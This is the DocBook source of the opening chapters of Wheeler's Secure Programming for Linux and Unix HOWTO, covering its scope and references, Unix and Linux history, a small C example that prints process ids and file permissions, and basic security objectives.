<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook V4.1//EN">

<!-- "Secure Programming for Linux and Unix HOWTO",
Copyright (C) 1999-2003 David A. Wheeler
http://www.dwheeler.com/secure-programs -->

<!-- WARNING!!! This book is MUCH LARGER than the tiny little HOWTOs
that you may be used to, and I've found that you have to
reconfigure certain tools and use some tools carefully
for this book to be produced properly.

TeX's default save-size is TOO SMALL to print this large book.
You need to modify the TeX configuration file "texmf.cnf"; this is in
"/usr/share/texmf/web2c" on Red Hat Linux 7.1, and in "/etc" on some
other systems. Change the entry saying:
save_size.pdfjadetex = 5000
to a larger size, say:
save_size.pdfjadetex = 30000

Also, for printing you need to change the style slightly using the
"-d" option, such as:
db2ps -d dwheeler-book-style.dsl Secure-Programs-HOWTO.sgml
Otherwise, the URLs run right off the right-hand side of the page
in the printed versions and it's really awful.

When generating the PDF, generate the PostScript and then
translate that to PDF. That has its disadvantages, but the
"db2pdf" can't handle figures properly (the TeX intermediate stage
can't handle .eps, and DocBook won't let you insert .pdf).
Ideally mediaobject would be more flexible than this..!

This is a book, so it should follow book conventions. This means
the first pages should be numbered with roman numerals
(the first page of chapter 1 becomes page 1), and that chapters always
begin on the right-hand side (odd numbered pages). Currently, the
DocBook tools don't do this - UGH! However, there are patches to do it -
http://www.mail-archive.com/docbook-apps@lists.oasis-open.org/msg02364.html
(Re: DOCBOOK-APPS: preface page numbering)
From: camille
Subject: Re: DOCBOOK-APPS: preface page numbering
Date: Fri, 24 Aug 2001 00:41:15 -0700
Mentions this - apply twosidestartonright.patch.bz2 and features.patch.bz2
(had to change the %top-margin% when using the patched openjade).
The "features" patch (Francis J. Lacoste's) must be applied first.
-->

<!-- This is a sample comment.
This book has had more titles than I'd like to think about. It was
originally titled "How to Write Secure Programs for Linux", then
"Design and Implementation Guidelines for Secure Linux Applications".
I first released it widely as the
"Secure Programming for Linux HOWTO", and then it morphed into the
"Secure Programming for Linux and Unix HOWTO".

You can get the latest version of this book from:
http://www.dwheeler.com/secure-programs/

Note that this is the DocBook DTD version!
To process it, get DocBook tools. If you are using Cygnus's tools, do this:
db2html Secure*.sgml
db2ps Secure*.sgml

Earlier versions through version 1.60 used the Linuxdoc DTD;
Version 2.00 has the same content as 1.60, but in DocBook format.
While the book is now legal DocBook content, it's not "fully"
marked-up; suggestions on missing markings welcome.

-->

<!--
??? Need to add material from Oliver Friedrichs <of@securityfocus.com>
http://www.securityfocus.com/forums/secprog/secure-programming.html
backup copy at:
http://www.cli.di.unipi.it/~zoppi/docs/secprog.html
now cached at:
http://www.google.com/search?q=cache:DpVgMo24NZQ:www.securityfocus.com/forum
s/secprog/secure-programming.html+%22Oliver+Friedrichs%22+%22secure+programm
ing%22&hl=en
especially code examples. This will add Windows-related material, so
I'll change the title to be more inclusive and add summary materials about
Windows' security approaches. This will involve a modification of many
areas, since most of the text assumes a Unix-like only viewpoint.

??? Should look at Razvan Peteanu <razvan.peteanu@home.com>'s material at
http://members.home.net/razvan.peteanu/Best%20Practices%20for%20Secure%20Web
%20Development%203.0.pdf
to see if I've missed anything.

??? Examine other material:
LSAP FAQ http://lsap.org/faq.txt
http://www.w3.org/Security/Faq/www-security-faq.html
http://security.devx.com/ See Best Defense Tab & more defense articles.
http://members.home.net/razvan.peteanu/
http://www.shmoo.com/securecode/
http://www.securityfocus.com/frames/?content=/forums/secprog/intro.html A listserve on the subject.
http://heap.nologin.net/aspsec.html
http://www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog1.html
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog2.html
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog3.html
and so on till
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog8.html
Good developer oriented resources:
http://www-106.ibm.com/developerworks/security/
http://www.boran.com/security/it13-applications.html

Some code review sites:
http://www.homeport.org/~adam/review.html
http://www.mozilla.org/hacking/reviewers.html
http://www.dnaco.net/~kragen/security-holes.html

I have other links at http://heap.nologin.net/programming.html which may be
of interest, but those seemed most relevant.

For general statistics on computer crime, see the FBI/CSI
"Computer Crime and Security Survey", e.g.,
http://www.gocsi.com/press/20020407.html

-->

<book>

<bookinfo>

<!-- bookbiblio -->

<title>Secure Programming for Linux and Unix HOWTO</title>
<author>
<firstname>David</firstname> <othername role="mi">A.</othername><surname>Wheeler</surname>
</author>
<address><email>dwheeler@dwheeler.com</email></address>
<pubdate>v3.010, 3 March 2003</pubdate>
<edition>v3.010</edition>
<!-- FYI: The LDP claims they don't use the "edition" tag. -->
<copyright>
<year>1999</year>
<year>2000</year>
<year>2001</year>
<year>2002</year>
<year>2003</year>
<holder>David A. Wheeler</holder>
</copyright>

<legalnotice>
<para>
This book is Copyright (C) 1999-2003 David A. Wheeler.
Permission is granted to copy, distribute and/or modify
this book under the terms of the GNU Free Documentation License (GFDL),
Version 1.1 or any later version published by the Free Software Foundation;
with the invariant sections being ``About the Author'',
with no Front-Cover Texts, and no Back-Cover texts.
A copy of the license is included in the section entitled
"GNU Free Documentation License".
This book is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
</para>
</legalnotice>

<abstract>
<para>
This book provides a set of design and implementation
guidelines for writing secure programs for Linux and Unix systems.
Such programs include application programs used as viewers of remote data,
web applications (including CGI scripts),
network servers, and setuid/setgid programs.
Specific guidelines for C, C++, Java, Perl, PHP, Python, Tcl,
and Ada95 are included.
For a current version of the book, see
<ulink url="http://www.dwheeler.com/secure-programs">
http://www.dwheeler.com/secure-programs</ulink>.
</para>
</abstract>

<!-- /bookbiblio -->
<keywordset>
<keyword>secure programming</keyword>
<keyword>secure programs</keyword>
<keyword>secure applications</keyword>
<keyword>secure</keyword>
<keyword>programming</keyword>
<keyword>security</keyword>
<keyword>Linux</keyword>
<keyword>Unix</keyword>
<keyword>hack</keyword>
<keyword>crack</keyword>
<keyword>vulnerability</keyword>
<keyword>buffer overflow</keyword>
<keyword>design</keyword>
<keyword>implementation</keyword>
<keyword>web application</keyword>
<keyword>web applications</keyword>
<keyword>CGI</keyword>
<keyword>setuid</keyword>
<keyword>setgid</keyword>
<keyword>C</keyword>
<keyword>C++</keyword>
<keyword>Java</keyword>
<keyword>Perl</keyword>
<keyword>PHP</keyword>
<keyword>Python</keyword>
<keyword>Tcl</keyword>
<keyword>Ada</keyword>
<keyword>Ada95</keyword>
</keywordset>

</bookinfo>

<!-- Begin the book -->

<chapter id="introduction">
<title>Introduction</title>

<epigraph>
<attribution>Proverbs 21:22 (NIV)</attribution>
<para>
A wise man attacks the city of the mighty
and pulls down the stronghold in which they trust.
</para>
</epigraph>

<para>
This book describes a set of guidelines for
writing secure programs on Linux and Unix systems.
For purposes of this book, a ``secure program'' is a program
that sits on a security boundary, taking input from a source that does
not have the same access rights as the program.
Such programs include application programs used as viewers of remote data,
web applications (including CGI scripts),
network servers, and setuid/setgid programs.
This book does not address modifying the operating system kernel itself,
although many of the principles discussed here do apply.
These guidelines were developed as a survey of
``lessons learned'' from various sources on how to create such programs
(along with additional observations by the author),
reorganized into a set of larger principles.
This book includes specific guidance for a number of languages,
including C, C++, Java, Perl, PHP, Python, Tcl, and Ada95.
</para>

<para>
You can find the master copy of this book at
<ulink url="http://www.dwheeler.com/secure-programs">http://www.dwheeler.com/secure-programs</ulink>.
This book is also part of the Linux Documentation Project (LDP) at
<ulink
url="http://www.tldp.org">http://www.tldp.org</ulink>.
It's also mirrored in several other places.
Please note that these mirrors, including the LDP copy and/or the
copy in your distribution, may be older than the master copy.
I'd like to hear comments on this book, but please do not send comments
until you've checked to make sure that your comment is valid for the
latest version.
</para>

<para>
This book does not cover assurance measures, software engineering
processes, or quality assurance approaches,
which are important but widely discussed elsewhere.
Such measures include testing, peer review,
configuration management, and formal methods.
Documents specifically identifying sets of development
assurance measures for security issues include
the Common Criteria (CC, [CC 1999]) and the
Systems Security Engineering Capability Maturity Model [SSE-CMM 1999].
Inspections and other peer review techniques are discussed in
[Wheeler 1996].
This book does briefly discuss ideas from the CC, but only as an organizational
aid to discuss security requirements.
More general sets of software engineering processes
are defined in documents such as the
Software Engineering Institute's Capability Maturity Model for Software
(SW-CMM) [Paulk 1993a, 1993b]
and ISO 12207 [ISO 12207].
General international standards for quality systems are defined in
ISO 9000 and ISO 9001 [ISO 9000, 9001].

<!--
http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/iso9000family.html
Note that ISO 9001-3 is obsolete.
-->
<!-- ??? Ideally have references for these. -->
</para>

<para>
This book does not discuss how to configure a system (or network)
to be secure in a given environment. This is clearly necessary for
secure use of a given program,
but a great many other documents discuss secure configurations.
An excellent general book on configuring Unix-like systems to be
secure is Garfinkel [1996].
Other books for securing Unix-like systems include Anonymous [1998].
You can also find information on configuring Unix-like systems at web sites
such as
<ulink url="http://www.unixtools.com/security.html">http://www.unixtools.com/security.html</ulink>.
Information on configuring a Linux system to be secure is available in a
wide variety of documents including
Fenzi [1999], Seifried [1999], Wreski [1998], Swan [2001],
and Anonymous [1999].
Geodsoft [2001] describes how to harden OpenBSD,
and many of its suggestions are useful for any Unix-like system.
Auditing existing Unix-like systems is discussed in
Mookhey [2002].
For Linux systems (and eventually other Unix-like systems),
you may want to examine the Bastille Hardening System, which
attempts to ``harden'' or ``tighten'' the Linux operating system.
You can learn more about Bastille at
<ulink url="http://www.bastille-linux.org">http://www.bastille-linux.org</ulink>;
it is available for free under the General Public License (GPL).
Other hardening systems include
<ulink url="http://www.grsecurity.net">grsecurity</ulink>.
For Windows 2000, you might want to look at
Cox [2000].
The U.S. National Security Agency (NSA) maintains a set of
security recommendation guides at
<ulink url="http://nsa1.www.conxion.com">http://nsa1.www.conxion.com</ulink>,
including the ``60 Minute Network Security Guide.''
If you're trying to establish a public key infrastructure (PKI) using
open source tools, you might want to look at the
<ulink url="http://ospkibook.sourceforge.net">Open Source PKI Book</ulink>.
More about firewalls and Internet security is found in
[Cheswick 1994].
</para>

<para>
Configuring a computer is only part of Security Management, a larger
area that also covers how to deal with viruses, what kind of
organizational security policy is needed, business continuity plans, and
so on.
There are international standards and guidance for security management.
ISO 13335 is a five-part
technical report giving guidance on security management [ISO 13335].
ISO/IEC 17799:2000 defines a code of practice [ISO 17799];
its stated purpose is to give high-level and general
``recommendations for information security management
for use by those who are responsible for initiating, implementing or
maintaining security in their organization.''
The document specifically identifies itself as
"a starting point for developing organization specific guidance."
It also states that not all of the guidance and controls it contains may be
applicable, and that additional controls not contained in it may be required.
Even more importantly, it is intended to provide
broad guidelines covering a number of areas,
and is not intended to give definitive details or "how-tos".
It's worth noting that the original
signing of ISO/IEC 17799:2000 was controversial;
Belgium, Canada, France, Germany, Italy, Japan and the US
voted <emphasis>against</emphasis> its adoption.
However, it appears that these votes were primarily a protest on
parliamentary procedure, not on the content of the document,
and certainly people are welcome to use ISO 17799 if they find it helpful.
More information about ISO 17799 can be found in NIST's
<ulink url="http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf">
ISO/IEC 17799:2000 FAQ</ulink>.
ISO 17799 is closely related to BS 7799 parts 1 and 2;
more information about BS 7799 can be found at
<ulink url="http://www.xisec.com/faq.htm">http://www.xisec.com/faq.htm</ulink>.
ISO 17799 is currently under revision.
It's important to note that none of these standards
(ISO 13335, ISO 17799, or BS 7799 parts 1 and 2)
is intended to be a detailed set of technical guidelines for software
developers;
they are all intended to provide broad guidelines in a number of areas.
This is important, because software developers who
simply follow (for example) ISO 17799 will
generally <emphasis>not</emphasis> produce
secure software - developers need much, much, much
more detail than ISO 17799 provides.
</para>

<para>
The Commonly Accepted Security Practices &amp; Recommendations (CASPR)
project at
<ulink url="http://www.caspr.org">http://www.caspr.org</ulink>
is trying to distill information security knowledge into a series of
papers available to all (under the GNU FDL license, so that future
document derivatives will continue to be available to all).
Clearly, security management needs to include keeping up with patches
as vulnerabilities are found and fixed.
Beattie [2002] provides an
interesting analysis of how to determine when to apply patches,
contrasting the risk of a bad patch with the risk of intrusion
(e.g., under certain conditions, patches are optimally
applied 10 or 30 days after they are released).
</para>

<para>
If you're interested in the current state of vulnerabilities, there are
other resources available to use.
The CVE at http://cve.mitre.org gives a standard identifier for each
(widespread) vulnerability.
The paper
<ulink url="http://securitytracker.com/learn/securitytracker-stats-2002.pdf">
SecurityTracker Statistics</ulink>
analyzes vulnerabilities to determine which
were the most common.
The Internet Storm Center at http://isc.incidents.org/
shows the prominence of various Internet attacks around the world.
</para>

<para>
This book assumes that the reader understands computer
security issues in general, the general security model of Unix-like systems,
networking (in particular TCP/IP based networks),
and the C programming language.
This book does include some information about the Linux and Unix
programming model for security.
If you need more information on how TCP/IP based networks and protocols
work, including their security protocols, consult general works on
TCP/IP such as [Murhammer 1998].
</para>

<para>
When I first began writing this document, there were many short articles
but no books on writing secure programs.
There are now two other books on writing secure programs.
One is ``Building Secure Software'' by John Viega and Gary McGraw [Viega 2002];
this is a very good book that discusses a number of important security issues,
but it omits a large number of important security problems that are
instead covered here.
Basically, their book selects several important topics and covers them
well, but at the cost of omitting many other important topics.
The Viega book has a little more information for Unix-like systems than for
Windows systems, but much of it is independent of the kind of system.
The other book is ``Writing Secure Code'' by Michael Howard and David LeBlanc
[Howard 2002].
The title of this other book is misleading;
the book is solely about writing secure programs for Windows,
and is basically worthless if you are writing programs for any other system.
This shouldn't be surprising; it's published by Microsoft Press, and its
copyright is owned by Microsoft.
If you are trying to write secure programs for Microsoft's
Windows systems, it's a good book.
Another useful source of secure programming guidance is the
<ulink url="http://www.owasp.org/guide">
Open Web Application Security Project (OWASP)
Guide to Building Secure Web Applications and Web Services</ulink>;
it has more on process, and fewer specifics, than this book, but it
has useful material in it.
</para>

<para>
This book covers all Unix-like systems, including Linux and the
various strains of Unix, and it particularly stresses Linux and provides
details about Linux specifically.
There's some material specifically on Windows CE, and in fact much of
this material is not limited to a particular operating system.
If you know relevant information not already included here, please let
me know.
</para>

<para>
This book is copyright (C) 1999-2003 David A. Wheeler and is covered by the
GNU Free Documentation License (GFDL);
see <xref linkend="about-license"> and
<xref linkend="fdl"> for more information.
</para>

<para>
<xref linkend="background">
discusses the background of Unix, Linux, and security.
<xref linkend="features">
describes the general Unix and Linux security model,
giving an overview of the security attributes and operations of
processes, filesystem objects, and so on.
This is followed by the meat of this book, a set of design and implementation
guidelines for developing applications on Linux and Unix systems.
The book ends with conclusions in
<xref linkend="conclusion">,
followed by a lengthy bibliography and appendixes.
</para>

<!-- ???: Reference other taxonomies, such as Bisbey's at
http://seclab.cs.ucdavis.edu/projects/history/papers/bisb78.pdf
and see if I should (partially) switch to one of them.
-->
<para>
The design and implementation guidelines are divided into
categories which I believe emphasize the programmer's viewpoint.
Programs accept inputs, process data, call out to other resources,
and produce output, as shown in <xref linkend="abstract-program">;
notionally all security guidelines fit into one of these categories.
I've subdivided ``process data'' into
structuring program internals and approach,
avoiding buffer overflows (which in some cases can also be considered
an input issue),
language-specific information, and special topics.
The chapters are ordered to make the material easier to follow.
Thus, the book chapters giving guidelines discuss
validating all input (<xref linkend="input">),
avoiding buffer overflows (<xref linkend="buffer-overflow">),
structuring program internals and approach (<xref linkend="internals">),
carefully calling out to other resources (<xref linkend="call-out">),
judiciously sending information back (<xref linkend="output">),
language-specific information (<xref linkend="language-specific">),
and finally information on special topics such as how to acquire random
numbers (<xref linkend="special">).
</para>

<figure float="1" id="abstract-program">
<title>Abstract View of a Program</title>
<mediaobject>
<imageobject>
<imagedata scalefit="1" scale="50" fileref="images/program.eps" format="eps">
</imageobject>
<imageobject>
<imagedata fileref="images/program.png" format="png">
</imageobject>
<textobject>
<phrase>
A program accepts inputs, processes data,
possibly calls out to other programs, and produces output.
</phrase>
</textobject>
</mediaobject>
</figure>

</chapter>

<chapter id="background">
<title>Background</title>

<epigraph>
<attribution>Ezra 4:19 (NIV)</attribution>
<para>
I issued an order and a search was made, and it was found that this
city has a long history of revolt against kings and has been
a place of rebellion and sedition.
</para>
</epigraph>

<sect1 id="history">
<title>History of Unix, Linux, and Open Source / Free Software</title>

<sect2 id="unix-history">
<title>Unix</title>

<para>
In 1969-1970, Kenneth Thompson, Dennis Ritchie, and others at
AT&amp;T Bell Labs began developing
a small operating system on a little-used PDP-7.
The operating system was soon christened Unix, a pun on an earlier operating
system project called MULTICS.
In 1972-1973 the system was rewritten in the programming language C,
an unusual step that was visionary: due to this decision, Unix was
the first widely-used operating system that
could switch from and outlive its original hardware.
Other innovations were added to Unix as well, in part due to synergies
between Bell Labs and the academic community.
In 1979, the ``seventh edition'' (V7) version
of Unix was released, the grandfather of all extant Unix systems.
</para>

<para>
After this point, the history of Unix becomes somewhat convoluted.
The academic community, led by Berkeley, developed a variant called the
Berkeley Software Distribution (BSD), while AT&amp;T continued developing
Unix under the names ``System III'' and later ``System V''.
In the late 1980s through early 1990s
the ``wars'' between these two major strains raged.
After many years each variant adopted many of the key features of the other.
Commercially, System V won the ``standards wars'' (getting most of its
interfaces into the formal standards), and
most hardware vendors switched to AT&amp;T's System V.
However, System V ended up incorporating many BSD innovations, so the
resulting system was more a merger of the two branches.
The BSD branch did not die, but instead became widely used
for research, for PC hardware, and for
single-purpose servers (e.g., many web sites use a BSD derivative).
</para>

<para>
The result was many different versions of Unix,
all based on the original seventh edition.
Most versions of Unix were proprietary and maintained by their respective
hardware vendor; for example, Sun Solaris is a variant of System V.
Three versions of the BSD branch of Unix ended up as open source:
FreeBSD (concentrating on ease-of-installation for PC-type hardware),
NetBSD (concentrating on many different CPU architectures), and
a variant of NetBSD, OpenBSD (concentrating on security).
More general information about Unix history can be found at
<ulink
url="http://www.datametrics.com/tech/unix/uxhistry/brf-hist.htm">http://www.datametrics.com/tech/unix/uxhistry/brf-hist.htm</ulink>,
<ulink
url="http://perso.wanadoo.fr/levenez/unix">http://perso.wanadoo.fr/levenez/unix</ulink>, and
<ulink url="http://www.crackmonkey.org/unix.html">
http://www.crackmonkey.org/unix.html
</ulink>.
Much more information about the BSD history can be found in
[McKusick 1999] and
<ulink
url="ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/src/share/misc/bsd-family-tree">ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/src/share/misc/bsd-family-tree</ulink>.
</para>

<para>
A slightly old but interesting advocacy piece that presents arguments
for using Unix-like systems (instead of Microsoft's products) is
<ulink
url="http://web.archive.org/web/20010801155417/www.unix-vs-nt.org/kirch">
John Kirch's paper ``Microsoft Windows NT Server 4.0 versus UNIX''
</ulink>.
<!-- Note that researchers prefer Unix-like systems, not Windows; see
http://www.dyncorp-is.com/darpa/meetings/win98aug/wars.html -->
</para>

</sect2>

<sect2 id="fsf-history">
<title>Free Software Foundation</title>

<para>
In 1984 Richard Stallman's Free Software Foundation (FSF) began the GNU
project, a project to create a free version of the Unix operating system.
By free, Stallman meant software that could be freely
used, read, modified, and redistributed.
The FSF successfully built a vast number of
useful components, including a C compiler (gcc), an
impressive text editor (emacs), and a host of fundamental tools.
However, in the 1990s the FSF
was having trouble developing the operating system kernel [FSF 1998];
without a kernel their dream of a completely free operating system
would not be realized.
</para>

</sect2>

<sect2 id="linux-history">
<title>Linux</title>

<para>
In 1991 Linus Torvalds began developing an operating system kernel, which
he named ``Linux'' [Torvalds 1999].
This kernel could be combined with the FSF material and other components
(in particular some of the BSD components and MIT's X Window System software) to
produce a freely-modifiable and very useful operating system.
This book will term the kernel itself the ``Linux kernel'' and
an entire combination ``Linux''.
Note that many use the term ``GNU/Linux'' instead for this combination.
</para>

<para>
In the Linux community,
different organizations have combined the available components differently.
Each combination is called a ``distribution'', and the organizations that
develop distributions are called ``distributors''.
Common distributions include Red Hat, Mandrake, SuSE, Caldera, Corel,
and Debian.
There are differences between the various distributions,
but all distributions are based on the same foundation: the
Linux kernel and the GNU glibc libraries.
Since both are covered by ``copyleft'' style licenses, changes to
these foundations generally must be made available to all, a
unifying force between the Linux distributions at their foundation
that does not exist between the BSD and AT&amp;T-derived Unix systems.
This book is not specific to any Linux distribution; when it
discusses Linux it presumes Linux
kernel version 2.2 or greater and the C library glibc 2.1 or greater,
valid assumptions for essentially all current major
Linux distributions.
</para>

</sect2>

<sect2 id="oss-history">
|
||
<title>Open Source / Free Software</title>
|
||
|
||
<para>
|
||
Increased interest in software that is freely shared
|
||
has made it increasingly necessary to define and explain it.
|
||
A widely used term is ``open source software'', which is further defined in
|
||
[OSI 1999].
|
||
Eric Raymond [1997, 1998] wrote several seminal articles examining
|
||
its various development processes.
|
||
Another widely-used term is ``free software'', where the ``free''
|
||
is short for ``freedom'': the usual explanation is ``free speech, not
|
||
free beer.''
|
||
Neither phrase is perfect.
|
||
The term
|
||
``free software'' is often confused with programs whose executables are
|
||
given away at no charge, but whose source code cannot be viewed, modified,
|
||
or redistributed.
|
||
Conversely, the term ``open source'' is sometime (ab)used
|
||
to mean software whose
|
||
source code is visible, but for which there are limitations on
|
||
use, modification, or redistribution.
|
||
This book uses the term ``open source'' for its usual meaning, that
|
||
is, software which has its source code freely available for
|
||
use, viewing, modification, and redistribution; a more detailed
|
||
definition is contained in the
|
||
<ulink
|
||
url="http://www.opensource.org/osd.html">Open Source Definition</ulink>.
|
||
In some cases, a difference in motive is suggested;
|
||
those preferring the term ``free software'' wish to strongly
|
||
emphasize the need for freedom, while those using the term ``open source'' may have
|
||
other motives (e.g., higher reliability) or simply wish to appear less
|
||
strident.
|
||
Information on this definition of free software, and
|
||
the motivations behind it, can be found at
|
||
<ulink url="http://www.fsf.org">http://www.fsf.org</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Those interested in reading advocacy pieces for open source software
|
||
and free software should see
|
||
<ulink
|
||
url="http://www.opensource.org">http://www.opensource.org</ulink> and
|
||
<ulink
|
||
url="http://www.fsf.org">http://www.fsf.org</ulink>.
|
||
Other documents examine such software; for example,
|
||
Miller [1995]
|
||
found that the open source software was noticeably
|
||
more reliable than proprietary software
|
||
(using their measurement technique, which measured
|
||
resistance to crashing due to random input).
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="linux-vs-unix">
|
||
<title>Comparing Linux and Unix</title>
|
||
|
||
<para>
|
||
This book uses the term ``Unix-like'' to describe
|
||
systems intentionally like Unix.
|
||
In particular, the term ``Unix-like'' includes
|
||
all major Unix variants and Linux distributions.
|
||
Note that many people simply use the term ``Unix'' to describe these systems
|
||
instead.
|
||
Originally, the term ``Unix'' meant a particular product developed
|
||
by AT&T.
|
||
Today, the Open Group owns the Unix trademark, and it defines Unix as
|
||
``the worldwide Single UNIX Specification''.
|
||
<!-- http://www.unix-systems.org/what_is_unix.html -->
|
||
</para>
|
||
|
||
<para>
|
||
Linux is not derived from Unix source code, but its interfaces are
|
||
intentionally like Unix.
|
||
Therefore, Unix lessons learned generally apply to both, including information
|
||
on security.
|
||
Most of the information in this book applies to any Unix-like system.
|
||
Linux-specific information has been intentionally added to
|
||
enable those using Linux to take advantage of Linux's capabilities.
|
||
</para>
|
||
|
||
<para>
|
||
Unix-like systems share a number of security mechanisms, though there
|
||
are subtle differences and not all systems have all mechanisms available.
|
||
All include user and group ids (uids and gids) for each process and
|
||
a filesystem with read, write, and execute permissions (for user, group, and
|
||
other).
|
||
<!-- ???: Most include System V single-machine
|
||
inter-process communication (IPC) mechanisms
|
||
and BSD's socket-based IPC (which support networks). -->
|
||
See Thompson [1974] and Bach [1986]
|
||
for general information on Unix systems, including their basic
|
||
security mechanisms.
|
||
<xref linkend="features">
|
||
summarizes key security features of Unix and Linux.
|
||
</para>
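
<para>
As a rough illustration of the ids and permission bits described above,
the following C sketch prints the calling process's real and effective
uid and gid, and renders a file's user, group, and other permission bits
as text.
The function names format_mode and show_identity_and_file are made up for
this example; the calls it relies on (getuid, geteuid, getgid, getegid,
and stat) are standard POSIX interfaces.
The sketch deliberately ignores anything beyond the nine basic bits
(for example, setuid bits or access control lists).
</para>

<programlisting><![CDATA[
```c
#include <assert.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Render the nine basic permission bits of `mode` as "rwxrwxrwx"-style
 * text (user, group, other). `out` must hold at least 10 bytes. */
void format_mode(mode_t mode, char out[10])
{
    static const mode_t bits[9] = {
        S_IRUSR, S_IWUSR, S_IXUSR,
        S_IRGRP, S_IWGRP, S_IXGRP,
        S_IROTH, S_IWOTH, S_IXOTH
    };
    static const char letters[] = "rwxrwxrwx";
    int i;

    assert(out != NULL);
    for (i = 0; i < 9; i++)
        out[i] = (mode & bits[i]) ? letters[i] : '-';
    out[9] = '\0';
}

/* Print the calling process's real and effective ids, then the owner
 * and permissions of `path`. Returns 0 on success, -1 if stat() fails. */
int show_identity_and_file(const char *path)
{
    struct stat st;
    char perms[10];

    assert(path != NULL);
    printf("uid=%ld euid=%ld gid=%ld egid=%ld\n",
           (long)getuid(), (long)geteuid(),
           (long)getgid(), (long)getegid());
    if (stat(path, &st) != 0)
        return -1;
    format_mode(st.st_mode, perms);
    printf("%s owner uid=%ld gid=%ld mode=%s\n",
           path, (long)st.st_uid, (long)st.st_gid, perms);
    return 0;
}
```
]]></programlisting>

<para>
The real and effective ids printed here normally match; they differ when
a program runs with privileges other than those of the invoking user,
which is one of the subtle cases a secure program has to handle.
</para>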
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="security-principles">
|
||
<title>Security Principles</title>
|
||
|
||
<para>
|
||
There are many general security principles which you should be
|
||
familiar with; one good place for general information on information security
|
||
is the Information Assurance Technical Framework (IATF) [NSA 2000].
|
||
NIST has identified high-level ``generally accepted principles and practices''
|
||
[Swanson 1996].
|
||
You could also look at a general textbook on computer security, such as
|
||
[Pfleeger 1997].
|
||
NIST Special Publication 800-27 describes a number of good engineering
|
||
principles (although, since they're abstract, they're insufficient for
|
||
actually building secure programs - hence this book);
|
||
you can get a copy at
|
||
<ulink url="http://csrc.nist.gov/publications/nistpubs/800-27/sp800-27.pdf">
|
||
http://csrc.nist.gov/publications/nistpubs/800-27/sp800-27.pdf</ulink>.
|
||
A few security principles are summarized here.
|
||
</para>
|
||
|
||
<para>
|
||
Often computer security objectives (or goals) are described in terms of three
|
||
overall objectives:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Confidentiality</emphasis> (also known as secrecy), meaning that the
|
||
computing system's assets can be read only by authorized parties.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Integrity</emphasis>, meaning that the assets can only be modified or deleted by
|
||
authorized parties in authorized ways.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Availability</emphasis>,
|
||
meaning that the assets are accessible to the authorized
|
||
parties in a timely manner (as determined by the system's requirements).
|
||
The failure to meet this goal is called a denial of service.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
|
||
Some people define additional major security objectives, while others treat
|
||
those additional goals as special cases of these three.
|
||
For example, some separately
|
||
identify non-repudiation as an objective; this is
|
||
the ability to ``prove'' that a sender sent or receiver received a message
|
||
(or both), even if the sender or receiver wishes to deny it later.
|
||
Privacy is sometimes addressed separately from confidentiality;
|
||
some define this as protecting the confidentiality of a
|
||
<emphasis>user</emphasis> (e.g., their identity) instead of the data.
|
||
Most objectives require identification and authentication, which is
|
||
sometimes listed as a separate objective.
|
||
Often auditing (also called accountability) is identified
|
||
as a desirable security objective.
|
||
Sometimes ``access control'' and ``authenticity'' are listed separately
|
||
as well.
|
||
For example,
|
||
the U.S. Department of Defense (DoD), in DoD directive 3600.1
|
||
<!-- (both December 9, 1996 and October 2001) -->
|
||
defines ``information assurance'' as
|
||
``information operations (IO) that protect and defend
|
||
information and information systems by ensuring
|
||
their availability, integrity, authentication,
|
||
confidentiality, and nonrepudiation.
|
||
This includes providing for restoration of information systems by
|
||
incorporating protection, detection, and reaction capabilities.''
|
||
</para>
|
||
|
||
|
||
<!--
|
||
It defines ``information operations'' as
|
||
``actions taken to affect adversary information, information systems
|
||
and decision making, while defending one's own information, information
|
||
systems and decision making.''
|
||
|
||
This is also stated in the
|
||
National Security Telecommunications and Information Systems Security Committee
|
||
(later renamed to the Committee on National Security Systems)
|
||
released the
|
||
<ulink url="http://www.nstissc.gov/Assets/pdf/4009.pdf">
|
||
``National Information Systems Security (INFOSEC) Glossary''</ulink>
|
||
(NSTISSI No. 4009), Sept 2000.
|
||
|
||
The Industry Advisory Council's Information Assurance (IA)
|
||
Special Interest Group (SIG), in their
|
||
<ulink url="http://www.iaconline.org/sig_infoassure.html">
|
||
Information Assurance Glossary</ulink>, defines information assurance as
|
||
``Conducting those operations that protect and defend
|
||
information and information systems by ensuring
|
||
availability, integrity, authentication, confidentiality,
|
||
and non-repudiation. This includes providing for restoration
|
||
of information systems by incorporating protection,
|
||
detection and reaction capabilities.''
|
||
The U.S. Air Force's AFI 33-204 uses a similar definition for IA;
|
||
http://web1.deskbook.osd.mil/htmlfiles/rlframe/REFLIB_Frame.asp?TOC=/htmlfiles/TOC/330fktoc.asp?sNode=R&Exp=N&Doc=/reflib/maf/330fk/330fkdoc.htm&BMK=T2
|
||
it defines Information Assurance (IA)
|
||
as ``Information operations that protect and defend information
|
||
and information systems by ensuring their availability, integrity,
|
||
authentication, confidentiality, and nonrepudiation.
|
||
This includes providing for restoration of information systems
|
||
by incorporating protection, detection, and reaction capabilities.''
|
||
-->
|
||
<para>
